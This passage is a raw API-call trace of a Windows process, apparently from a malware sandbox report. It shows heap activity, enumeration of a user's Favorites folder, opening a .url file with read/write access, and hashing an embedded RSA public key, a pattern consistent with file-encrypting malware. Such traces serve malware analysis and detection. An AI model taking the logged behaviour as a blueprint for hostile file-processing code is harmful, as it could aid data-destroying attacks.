hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.085] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.085] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.085] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.086] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.086] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.086] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.086] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.086] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.086] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.087] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.087] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.087] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.087] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.087] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.088] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.088] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.088] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.088] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.088] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.089] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.089] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.089] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.089] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0189.089] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.090] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0189.091] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.091] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.091] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.091] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.091] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.091] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.091] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0189.092] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.092] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.092] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.092] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0189.092] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.093] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.093] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.093] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.093] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.093] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.093] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.093] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.093] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.094] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.094] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.094] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.094] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0189.094] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.094] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0189.095] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0189.095] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.095] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.096] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.096] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.096] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.096] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.096] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.097] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.097] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.097] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.097] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.097] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.097] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.097] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.098] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.098] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.099] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.099] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.099] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.099] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\") returned="Microsoft Websites\\" [0189.099] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0189.099] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38fd0 [0189.100] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.100] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\") returned="Favorites\\" [0189.100] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0189.100] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38fd0 | out: hHeap=0x6a0000) returned 1 [0189.100] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0189.100] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0189.100] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0189.100] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0189.101] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0189.101] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0189.101] PathFindFileNameW (pszPath="") returned="" [0189.101] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.101] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\*" (normalized: "c:\\users\\keecfmwgj\\favorites\\microsoft websites\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0189.103] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.103] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0189.103] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee50dc0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IE Add-on site.url", cAlternateFileName="IEADD-~1.URL")) returned 1 [0189.103] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.103] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa6) returned 0x2c2d9d0 [0189.103] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.103] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\IE Add-on site.url") returned=".url" [0189.103] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\microsoft websites\\ie add-on site.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0189.104] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=133) returned 1 [0189.104] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0189.107] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.107] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0189.108] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0189.108] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0189.108] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0189.108] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x85, lpOverlapped=0x0) returned 1 [0189.109] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.109] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0189.109] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.109] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.109] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0189.110] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0189.110] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0189.110] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0189.110] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0189.110] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0189.110] GetLastError () returned 0x0 [0189.110] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0189.110] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0189.110] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0189.111] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0189.111] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0189.111] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0189.111] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0189.111] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0189.111] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0189.111] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x794008 [0189.111] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0189.111] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0189.111] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0189.111] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0189.111] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0189.111] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0189.111] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38fd0 [0189.111] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d398b0 [0189.111] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d39018 [0189.112] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d398c8 [0189.112] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d398f8 [0189.112] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39958 [0189.112] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39910 [0189.112] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0189.112] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0189.112] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3bb48 [0189.112] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0189.112] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d398f8 | out: hHeap=0x6a0000) returned 1 [0189.112] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39910 | out: hHeap=0x6a0000) returned 1 [0189.112] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39958 | out: hHeap=0x6a0000) returned 1 [0189.112] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0189.113] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39958 [0189.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0189.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39910 [0189.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0189.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d398f8 [0189.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0189.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0189.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0189.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0189.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0189.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0189.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0189.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0189.114] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0189.114] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39910 | out: hHeap=0x6a0000) returned 1 [0189.114] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0189.114] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d398f8 | out: hHeap=0x6a0000) returned 1 [0189.114] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0189.114] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0189.114] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39958 | out: hHeap=0x6a0000) returned 1 [0189.114] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0189.114] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0189.115] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3bb48 | out: hHeap=0x6a0000) returned 1 [0189.115] GetCurrentThreadId () returned 0x264 [0189.115] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0189.115] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d43820 [0189.115] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84be0 [0189.115] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0189.115] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0189.115] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0189.115] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0189.115] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0189.115] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.116] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.116] GetCurrentThreadId () returned 0x264 [0189.116] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.116] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.116] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0189.116] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.116] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.117] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.117] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0189.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0189.117] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0189.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82b10 [0189.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0189.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0189.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0189.117] 